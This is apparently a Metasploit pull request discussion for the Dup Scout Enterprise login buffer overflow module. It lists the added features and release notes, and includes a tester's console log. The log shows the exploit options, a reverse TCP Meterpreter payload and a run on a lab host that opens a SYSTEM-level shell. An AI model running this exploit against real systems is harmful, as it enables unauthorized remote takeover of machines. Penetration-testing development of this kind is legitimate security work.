dup_scout_enterprise_login_bof: Add v9.9.14 target and auto targeting

[bcoles]

• Resolve Rubocop violations
• Add AutoCheck
• Add Notes
• Add v9.9.14 target
• Add auto targeting

[gwillcox-r7]

Seems to be working well, nice work @bcoles!

msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > show options

Module options (exploit/windows/http/dup_scout_enterprise_login_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.18.63.23     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.18.54.135    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run

[*] Started reverse TCP handler on 172.18.54.135:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 9.9.14.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise 9.9.14 (x86)
[*] Generating payload ...
[*] Sending payload (10000 bytes) ...
[*] Sending stage (175174 bytes) to 172.18.63.23
[*] Meterpreter session 1 opened (172.18.54.135:4444 -> 172.18.63.23:50856) at 2021-03-12 11:57:10 -0600


meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-KUO5CML
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

[gwillcox-r7]

Release Notes

Improved the exploits/windows/http/dup_scout_enterprise_login_bof module to add: support for v9.9.14 of Dup Scout Enterprise, additional Notes which may help pentesters determine the potential side effects of the exploit, support for the AutoCheck mixin to allow users to automatically check if a target is vulnerable prior to exploiting it, support for automatic targeting whereby the exploit will automatically determine the version of the target and will adjust the exploit accordingly if it is vulnerable, and compliance with new RuboCop standards.